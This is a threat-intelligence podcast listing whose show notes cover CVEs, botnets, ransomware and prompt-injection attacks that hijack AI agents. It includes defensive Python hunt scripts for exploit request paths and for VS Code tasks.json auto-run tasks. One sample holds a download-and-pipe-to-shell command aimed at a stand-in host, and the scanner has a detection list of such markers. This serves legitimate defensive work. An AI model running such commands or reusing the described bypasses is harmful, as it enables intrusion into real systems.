Dragon Bytes

Delivering weekly insights, research, and threat indicators to help security professionals track emerging threats and intelligence.

Episodes

  1. Sandboxes, Seizures, and the Industrialization of Cybercrime

    2D AGO

    This week on Dragon News Bytes, Eli Woodward and Will Baxter are joined by Will Thomas to break down a convergence of nation-state activity and critical infrastructure disruptions. We cover the FBI’s massive takedown of the RAMP cybercrime forum, the re-attribution of Poland’s energy sector cyberattack to Dragonfly, and a wave of critical sandbox escapes impacting developer and AI environments. Plus, we discuss how attackers are weaponizing physical snail mail for extortion and the strategic impact of Google’s latest disruption of the IPIDEA proxy infrastructure.

    Topics & References:

    Part 1: Major Infrastructure & Law Enforcement Actions

    FBI Seizes RAMP Cybercrime Forum: A major blow to Russian-speaking initial access brokers (IABs). RAMP stood as a safe haven for ransomware groups like Black Cat and LockBit after other forums banned the activity. Analyst Note: Expect forum migration and operational mistakes as these actors scatter to new homes. Read more: https://shorturl.at/cURYo

    Google Disrupts IPIDEA Infrastructure: A coordinated takedown of a massive residential proxy network leveraged by botnets (Kimwolf/AISURU) and fraud operations. The Impact: This creates a short-term detection window for hunters as adversaries migrate to noisier fallback infrastructure.

    Poland Energy Sector Re-attribution: CERT.PL has officially attributed the massive energy incident from late 2025 to Dragonfly (Energetic Bear) rather than Sandworm. Critical Takeaway: Hitachi Energy confirmed no product flaws were used; the breach stemmed from default credentials and environmental misconfigurations. Read more: https://shorturl.at/I707p

    Part 2: Emerging Vulnerabilities & Malware Campaigns

    Critical Sandbox Escapes (CVE-2026-22709): Assumptions of "safe execution" are failing in developer tooling and AI environments. We break down the Grist-Core Pyodide escape and the popular vm2 NodeJS library bypass.

    SolarWinds Web Help Desk RCE (CVE-2025-40551): An unauthenticated remote code execution vulnerability that serves as a high-impact lateral movement enabler. Key TTPs: whitelist bypass using malformed URIs containing /ajax/; the exploitation path includes /helpdesk/WebObjects/Helpdesk.woa/wo/ with wopage=LoginPref. Read more: https://tinyurl.com/y3x7vase

    CVE-2026-21962: "AI Slop" or Exploit? ISC observed scanning activity targeting WebLogic with non-functional, AI-generated payloads, highlighting a new challenge in distinguishing signal from noise. Read more: https://tinyurl.com/yx52bkwa

    TA584 Extortion Pivots: This initial access broker has tripled campaign volume, now using photos of physical snail mail customized with victim details to increase psychological pressure.

    New Report: Voices of the Cybersecurity Strategist - A Benchmark Report for Security Leaders. Insights from leading CISOs, VPs, and Directors on navigating threat landscapes, allocating resources, and aligning security with business objectives. Read the full report: https://tinyurl.com/4jxb3kc5

    Events & Community:

    RISE USA (San Francisco): February 18–19 at Stripe HQ. 🔗 to register: https://go.team-cymru.com/rise-usa-2026
    Brews and Briefings (Minneapolis): February 25th session focused on DPRK threat activity. 🔗 to register: https://go.team-cymru.com/brews-briefings-minneapolis
    FS-ISAC Spring Summit (Orlando): March 1–4 presentations on the latest fintech threats and CLOP ransomware. 🔗 to register: https://www.fsisac.com/events/2026-americas-spring
    RISE Ireland (Dublin): April 14–15 at Stripe Dublin. Call for Papers (CFP) is currently open. 🔗 to register: https://go.team-cymru.com/rise-ireland

    Connect with Us:
    Follow us on LinkedIn: https://www.linkedin.com/company/team-cymru
    Subscribe to the Dragon News Bytes feed: https://www.team-cymru.com/dnb

    Disclaimer: The views expressed in this podcast are those of the hosts and do not necessarily reflect the official policy or position of our employers.

    27 min
  2. Malicious Prompts, Botnet Backdoors, and the Industrialization of Cybercrime

    JAN 26

    This week on Dragon News Bytes, Eli Woodward and Will Baxter dive into the shift from "cottage industry" cybercrime to an industrialized assembly line fueled by AI. We break down high-urgency RCEs in Cisco Unified Platforms, the massive comeback of the Kimwolf Botnet via IoT backdoors, and the "new SQL injection" taking over AI workflows: Prompt Injection. Plus, we discuss the weaponization of VS Code extensions by North Korean actors (Purple Bravo) and provide a full update on our upcoming global event schedule.

    Topics & References:

    Part 1: Patch Now: High-Urgency Threats & Evolving Infrastructure

    Cisco Unified Platform RCE (CVE-2026-20045): A critical unauthenticated Remote Code Execution vulnerability granting root access to video and phone systems. Target URLs include /webcalling/Unity/ and /UCMuser. Read more: https://arcticwolf.com/resources/blog/cve-2026-20045/

    TP-Link VIGI & Edge Vulnerabilities: Critical flaws in VIGI cameras allow for remote takeover, highlighting the persistent risk in edge and IoT infrastructure. Read more: https://securityaffairs.com/187110/hacking/critical-tp-link-vigi-camera-flaw-allowed-remote-takeover-of-surveillance-systems.html

    Kimwolf Botnet Resurgence: Now exceeding two million devices, this botnet is scaling via pre-baked backdoors in consumer devices like TV boxes. Read more: https://krebsonsecurity.com/2026/01/kimwolf-botnet-lurking-in-corporate-govt-networks/

    Part 2: Hacking the Human OS & AI Abuse

    Help Desk Social Engineering: West African criminal groups are increasingly impersonating employees via phone calls to reset passwords for "payroll redirects."

    The AI Prompt Injection Revolution: Described as the "new SQL injection," prompt injection is resetting years of input sanitization efforts. We discuss agentic browsers bypassing security controls and a Microsoft Teams bug used to steal user tokens.

    DPRK (Purple Bravo) Targeting Developers: North Korean actors are weaponizing VS Code extensions and using tasks.json in the Evelyn Stealer malware to auto-execute when repositories are opened.

    Events & Community:

    SANS CTI Summit Happy Hour (Arlington, VA): Join Team Cymru and OpenCTI on January 26th.
    RISE USA (San Francisco): February 18–19 at Stripe HQ. 🔗 to register: https://go.team-cymru.com/rise-usa-2026
    Brews and Briefings (Minneapolis): Late February session focused on DPRK threat activity. 🔗 to register: https://go.team-cymru.com/brews-briefings-minneapolis
    FS-ISAC Spring Summit (Orlando): March presentations on the latest fintech threats. 🔗 to register: https://www.fsisac.com/events/2026-americas-spring
    RISE Ireland (Dublin): April 14–15 at Stripe Dublin. 🔗 to register: https://go.team-cymru.com/rise-ireland

    Connect with Us:
    Follow us on LinkedIn: https://www.linkedin.com/company/team-cymru
    Subscribe to the Dragon News Bytes feed: https://www.team-cymru.com/dnb

    Disclaimer: The views expressed in this podcast are those of the hosts and do not necessarily reflect the official policy or position of our employers.

    21 min
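    The Cisco Unified Platform entry above lists the target URLs /webcalling/Unity/ and /UCMuser, and the SolarWinds Web Help Desk entry in the previous episode's notes describes a whitelist bypass built from malformed URIs containing /ajax/ together with the /helpdesk/WebObjects/Helpdesk.woa/wo/ path and wopage=LoginPref. The following hunt script is an added example written for this page, not code from Team Cymru, the podcast, or any of the cited advisories. It assumes a combined-format web access log, treats the co-occurrence of the three WHD markers in one request as the indicator (the exact exploit structure is not stated in the notes), and decodes percent-encoding before matching so an obfuscated /ajax/ is still seen. The log lines are constructed sample input.

```python
"""Hunt web access logs for request paths named in the Dragon News Bytes show notes:
SolarWinds Web Help Desk (CVE-2025-40551) and Cisco Unified Platform (CVE-2026-20045).
Added example; indicator pairing and log format are assumptions, not the advisories' own rules."""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined"-style access log line (format assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

WHD_PATH = "/helpdesk/webobjects/helpdesk.woa/wo/"


def classify(uri):
    """Return the indicator tags matched by one request URI (empty list if none)."""
    # Decode percent-encoding once so /ajax/ hidden as %2Fajax%2F is still seen, and
    # compare case-insensitively, since the bypass relies on malformed URIs.
    decoded = unquote(uri)
    low = decoded.lower()
    query = parse_qs(urlsplit(decoded).query)
    tags = []
    if WHD_PATH in low:
        if "/ajax/" in low:
            tags.append("whd-ajax-bypass")
        if "LoginPref" in query.get("wopage", []):
            tags.append("whd-loginpref")
    # The Cisco paths are also used by legitimate clients; tag them so the
    # source IPs can be reviewed against the expected user population.
    if low.startswith("/webcalling/unity/") or low.startswith("/ucmuser"):
        tags.append("cisco-unified-path")
    return tags


def hunt(log_text):
    """Parse log lines; return [{ip, uri, status, tags}] for every line with at least one tag."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the hunt
        tags = classify(m["uri"])
        if tags:
            hits.append({"ip": m["ip"], "uri": m["uri"],
                         "status": int(m["status"]), "tags": tags})
    return hits


def by_source(hits):
    """Count flagged requests per source IP to decide which source to pivot on first."""
    return Counter(h["ip"] for h in hits)


# Constructed sample log (not real traffic): one plain WHD hit, one percent-encoded
# WHD hit, one Cisco path, and benign noise.
LOG_SAMPLE = "\n".join([
    '203.0.113.7 - - [10/Feb/2026:10:01:02 +0000] "GET /helpdesk/WebObjects/Helpdesk.woa/wo/ajax/?wopage=LoginPref HTTP/1.1" 200 512',
    '198.51.100.3 - - [10/Feb/2026:10:01:05 +0000] "GET /helpdesk/WebObjects/Helpdesk.woa/wo/ HTTP/1.1" 200 1024',
    '192.0.2.9 - - [10/Feb/2026:10:02:00 +0000] "POST /webcalling/Unity/ HTTP/1.1" 403 0',
    '203.0.113.7 - - [10/Feb/2026:10:03:00 +0000] "GET /helpdesk/WebObjects/Helpdesk.woa/wo/%2Fajax%2F?wopage=LoginPref HTTP/1.1" 200 2048',
    '10.0.0.5 - - [10/Feb/2026:10:04:00 +0000] "GET /index.html HTTP/1.1" 200 300',
])

if __name__ == "__main__":
    found = hunt(LOG_SAMPLE)
    for h in found:
        print(h["ip"], h["status"], ",".join(h["tags"]), h["uri"])
    print("by source:", dict(by_source(found)))
```

    A request that merely touches the Helpdesk.woa path is not reported on its own, because that is normal WHD traffic; the value of the hunt is the combination, plus the per-source count, which surfaces a single host probing repeatedly.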
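    The Purple Bravo entry above says the actors use tasks.json to auto-execute when a repository is opened. VS Code runs a task automatically on folder open when it carries "runOptions": {"runOn": "folderOpen"} (subject to the editor's automatic-task and workspace-trust settings), so a cheap pre-clone check is to scan every .vscode/tasks.json for such tasks. The scanner below is an added example written for this page, not Team Cymru's or the podcast's code. It assumes only the documented tasks.json schema; the comment stripper is needed because tasks.json is JSON with comments, and the "fetches_remote" heuristic (a list of download/decode markers) is an assumption, not a detection rule from the episode. The sample tasks.json is constructed and is not a real malware artifact.

```python
"""Scan .vscode/tasks.json files for tasks VS Code may run automatically on folder open.
Added example; the remote-fetch markers are a heuristic assumption."""
import json
import os
import re
import sys

# Heuristic markers for commands that pull or decode remote content (assumption).
REMOTE_MARKERS = ("curl", "wget", "invoke-webrequest", "iwr ", "powershell",
                  "base64", "| sh", "| bash")


def strip_jsonc(text):
    """Remove // and /* */ comments and trailing commas from JSON-with-comments,
    leaving string literals untouched so comment-like text inside strings survives."""
    out = []
    i, n, in_str = 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:  # keep escaped char, including \"
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    # Trailing commas before } or ] are legal in jsonc but rejected by json.loads.
    # (Heuristic: a ",}" sequence inside a string literal would also be touched.)
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def auto_run_tasks(tasks_json_text):
    """Return tasks marked runOptions.runOn == "folderOpen", with a flattened command
    line and a heuristic flag for commands that fetch or decode remote content."""
    doc = json.loads(strip_jsonc(tasks_json_text))
    findings = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
        cmd = " ".join(p for p in parts if p)
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "type": task.get("type"),
            "command": cmd,
            "fetches_remote": any(marker in cmd.lower() for marker in REMOTE_MARKERS),
        })
    return findings


def scan_repo(root):
    """Walk a checkout and report auto-run tasks from every .vscode/tasks.json found."""
    report = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8-sig") as fh:
                try:
                    found = auto_run_tasks(fh.read())
                except (json.JSONDecodeError, AttributeError) as exc:
                    # A tasks.json we cannot parse deserves a manual look, not silence.
                    found = [{"label": "<parse error>", "type": None,
                              "command": str(exc), "fetches_remote": False}]
            if found:
                report[path] = found
    return report


# Constructed sample (not a real malware artifact): a line comment, a comment-like
# string, trailing commas, one benign task and one folderOpen task.
SAMPLE_TASKS_JSON = """{
  // build helpers
  "version": "2.0.0",
  "tasks": [
    { "label": "install", "type": "shell", "command": "npm", "args": ["install"], },
    { "label": "setup /* not a comment */",
      "type": "shell",
      "command": "curl -s http://example.invalid/x | sh",
      "runOptions": { "runOn": "folderOpen" }, },
  ]
}"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, tasks in scan_repo(sys.argv[1]).items():
            for t in tasks:
                print(path, t)
    else:
        print(auto_run_tasks(SAMPLE_TASKS_JSON))
```

    Run it as `python scan_tasks.py /path/to/checkout` before opening an unfamiliar repository in the editor; any folderOpen task is worth reading, and one that downloads and pipes to a shell is the pattern to refuse outright.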
  3. The Call Is Coming from Inside the House

    JAN 19

    This week on Dragon News Bytes, Eli Woodward and Will Baxter break down the operational fires you need to fight now and the emerging AI threats targeting your internal guardrails. We cover the critical FortiSIEM zero-day RCE, the rise of AI prompt injection attacks across Microsoft Copilot and Salesforce, and the massive 58% year-over-year surge in ransomware victims. Plus, we discuss the strategic impact of the Red VDS infrastructure takedown and our upcoming global event schedule.

    Topics & References:

    Part 1: Emerging Threats

    FortiSIEM Zero-Day RCE (CVE-2025-64155): Critical remote code execution via the phMonitor service. If you use FortiSIEM, restrict TCP port 7900 immediately. Read more: https://horizon3.ai/attack-research/vulnerabilities/cve-2025-64155-fortinet-fortisiem/

    Red VDS Infrastructure Takedown: Microsoft’s disruption of a major "bulletproof" virtual desktop service used for fraud and financially motivated phishing.

    Ransomware Surge 2026: A 58% increase in publicly posted victims compared to 2024, with 124 active groups now tracked globally.

    Part 2: Emerging AI Threats

    AI Honeypot Findings: Discovery of automated scanning for Open LLM endpoints (Claude, ChatGPT, Ollama) originating from a single German source.

    AI Prompt Injection Attacks: New research into malicious prompts embedded in links that can hijack AI agents in Microsoft Copilot, Salesforce, and ServiceNow to steal user tokens and secrets. Read more: https://appomni.com/ao-labs/bodysnatcher-agentic-ai-security-vulnerability-in-servicenow/ and https://www.varonis.com/blog/reprompt

    The Three Pillars of AI Security: A strategic framework for defending against AI attacks, defending the AI your organization uses, and defending using AI tools. Read more: https://www.pillar.security/blog/the-agent-security-paradox-when-trusted-commands-in-cursor-become-attack-vectors

    Events & Community:

    SANS CTI Summit Happy Hour (Arlington, VA): Join Team Cymru and OpenCTI on January 26th.
    RISE USA (San Francisco): February 17–19 at Stripe HQ. 🔗 to register: https://go.team-cymru.com/rise-usa-2026
    Brews and Briefings (Minneapolis): Late February session focused on DPRK threat activity. 🔗 to register: https://go.team-cymru.com/brews-briefings-minneapolis
    FS-ISAC Spring Summit (Orlando): March presentations on the latest fintech threats. 🔗 to register: https://www.fsisac.com/events/2026-americas-spring
    RISE Ireland (Dublin): April 14–15 at Stripe Dublin. 🔗 to register: https://go.team-cymru.com/rise-ireland

    Connect with Us:
    Follow us on LinkedIn: https://www.linkedin.com/company/team-cymru
    Subscribe to the Dragon News Bytes feed: https://www.team-cymru.com/dnb

    Disclaimer: The views expressed in this podcast are those of the hosts and do not necessarily reflect the official policy or position of our employers.

    20 min
  4. Dragon Bytes: The "Trust Nothing" Update

    JAN 10

    This week on Dragon Bytes, we break down the operational fires you need to fight now and the emerging threats you’ll be fighting tomorrow. We cover the critical "Ni8mare" RCE in n8n automation tools, the new "ClickFix" social engineering waves hitting hospitality, and the "Zombie" D-Link routers building massive botnets. Plus, we dive into China-linked UAT-7290 targeting telcos and why Black Cat ransomware is poisoning your Google search results.

    Topics & References:

    Part 1: Emerging Threats

    The "Ni8mare" RCE (CVE-2026-21858): Critical unauthenticated remote code execution in n8n workflow automation tools. Read more: Horizon3.ai Analysis

    "ClickFix" Phishing Campaign: Fake "Blue Screen of Death" pages forcing users to run malicious PowerShell scripts. Currently targeting the European hospitality sector. Read more: Computing.co.uk Report

    "MongoBleed" (CVE-2025-14847): Unauthenticated memory leak in MongoDB exposing sensitive RAM data. Read more: Rapid7 Advisory

    "Ghost Tap" NFC Fraud: Android malware bridging the gap between cyber and physical payment terminal fraud. Read more: Inetco Research

    "ZombieAgent" AI Flaw: Embedding hidden text in documents to hijack AI agents via indirect prompt injection. Read more: SecurityBrief Asia

    GoBruteforcer Botnet: Golang-based malware targeting Linux servers to reach Web3/Crypto assets. Read more: BleepingComputer

    Part 2: Operational Fires

    D-Link "Zombie" RCE (CVE-2026-0625): Active exploitation of legacy D-Link DSL routers to build residential botnets. Read more: SC Media Report

    APT Alert: UAT-7290: China-linked espionage group using "Operational Relay Boxes" (ORBs) to target Telecommunications and Defense sectors. Read more: Infosecurity Magazine

    Black Cat Ransomware SEO Poisoning: The ransomware gang is now poisoning search results for IT tools like "WinSCP" and "Notepad++". Read more: News4Hackers

    Supply Chain & Breaches:

    Fake WinRAR Installers: Malwarebytes
    Ledger / Global-e Breach: Ledger Support
    NordVPN Breach Claim (Denied): NordVPN Blog

    Connect with Us:
    Subscribe to the Dragon News Bytes feed: Team Cymru

    Disclaimer: The views expressed in this podcast are those of the hosts and do not necessarily reflect the official policy or position of our employers.

    30 min
